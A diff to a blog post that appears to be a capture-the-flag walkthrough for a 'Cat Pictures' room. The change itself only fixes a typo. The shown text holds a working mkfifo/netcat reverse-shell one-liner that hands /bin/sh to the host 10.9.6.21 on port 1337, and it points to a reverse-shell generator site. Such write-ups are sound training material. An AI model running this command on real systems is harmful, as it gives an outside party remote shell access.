lanfran02/lanfran02.github.io/content/posts/cat-pictures/index.en.md

 drwxr-xr-x  2    0    0 4096 Apr  3 01:35 tmp
 drwxr-xr-x  4    0    0 4096 Apr  2 22:43 usr
 ```
-We now have to get a reverse shell, I usde the mkfifo shell, you can use other one!
+We now have to get a reverse shell, I used the mkfifo shell, you can use other one!
 I recommend you to use [revshells.com](https://revshells.com) to generate the commands for reverse shells.
 It's created and mantained by the CTF's community!

 `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.6.21 1337 >/tmp/f`